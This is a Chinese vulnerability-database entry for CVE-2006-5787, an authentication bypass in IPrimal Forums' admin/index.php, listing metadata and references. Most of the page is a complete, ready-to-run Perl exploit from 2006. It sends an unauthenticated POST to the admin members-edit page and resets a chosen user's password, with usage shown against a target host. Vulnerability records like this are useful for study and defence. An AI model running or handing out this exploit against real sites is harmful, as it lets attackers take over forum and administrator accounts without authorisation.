IPrimal Forums admin/index.php 认证绕过漏洞

QQ空间 新浪微博 微信 QQ facebook twitter
漏洞ID 1111474 漏洞类型 访问验证错误
发布时间 2006-11-06 更新时间 2006-11-09
CVE编号 CVE-2006-5787 CNNVD-ID CNNVD-200611-117
漏洞平台 PHP CVSS评分 7.5
|漏洞来源
https://www.exploit-db.com/exploits/2731
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200611-117
|漏洞详情
IPrimalForums中的admin/index.php存在认证绕过漏洞。远程攻击者通过直接请求来绕过认证并修改用户密码,可能和在admin/chk_admin.php内的认证问题有关。
|漏洞EXP
#!perl
#http://ipigroup.org/downloads/forums.zip
#Bl0od3r
#Germany
#shoutzz to all members of dC3 crew ,matrix_killer,eddie14
#special to str0ke
use IO::Socket;
if (@ARGV<4) {
&header;
} else { &start };

sub start() {
$host=$ARGV[0];
$path=$ARGV[1];
$user=$ARGV[2];
$passwd=$ARGV[3];
$post="usersname=".$user."&password=".$passwd."&email=test%40test.com&name=Dummy+user&tagline=Im+a+dumy+user&location=Ohio&bday=1983-11-20&job=Being+a+test+dummy&interests=Anything&bio=I%5C%5C%5C%27ve+been+sitting+on+this+db+my+whole+life.++HELP%21&signature=This+is+my+signature.&url=http%3A%2F%2Fipigroup.org&aim=myaim&yahoo=myyahoo&msn=mymsn%40hotmail.com&icq=546546&submitupdate=Update";
$len=length($post);
$sock=IO::Socket::INET->new(Proto=>"tcp",PeerAddr=>"$host",PeerPort=>"80")
or die ("Error");
print $sock "POST ".$path."admin/index.php?p=members&edit=".$user." HTTP/1.0\n";
print $sock "Host: ".$host."\n";
print $sock "Content-Type: application/x-www-form-urlencoded\n";
print $sock "Content-Length: ".$len."\n\n";
print $sock $post;

print "[+]Seems like your account has been created!Now try to login in :";
print "\n[+]User:$user\t[+]Password:$passwd";
}

sub header() {
print("
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
\t\t~~iPrimal Forums Users(ChangePass) 3xPl0!t~~
\t\t[+]By Bl0od3r
\t\t[+]dC3 Crew
\t\t[+]Usage:script.pl owned.org /script/ admin yeesss
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
");
}

# milw0rm.com [2006-11-06]
|参考资料

来源:BID
名称:20951
链接:http://www.securityfocus.com/bid/20951
来源:MILW0RM
名称:2731
链接:http://www.milw0rm.com/exploits/2731
来源:VUPEN
名称:ADV-2006-4383
链接:http://www.frsirt.com/english/advisories/2006/4383
来源:SECUNIA
名称:22757
链接:http://secunia.com/advisories/22757
来源:XF
名称:iprimalforums-chkadmin-sql-injection(30073)
链接:http://xforce.iss.net/xforce/xfdb/30073
来源:MILW0RM
名称:2731
链接:http://milw0rm.com/exploits/2731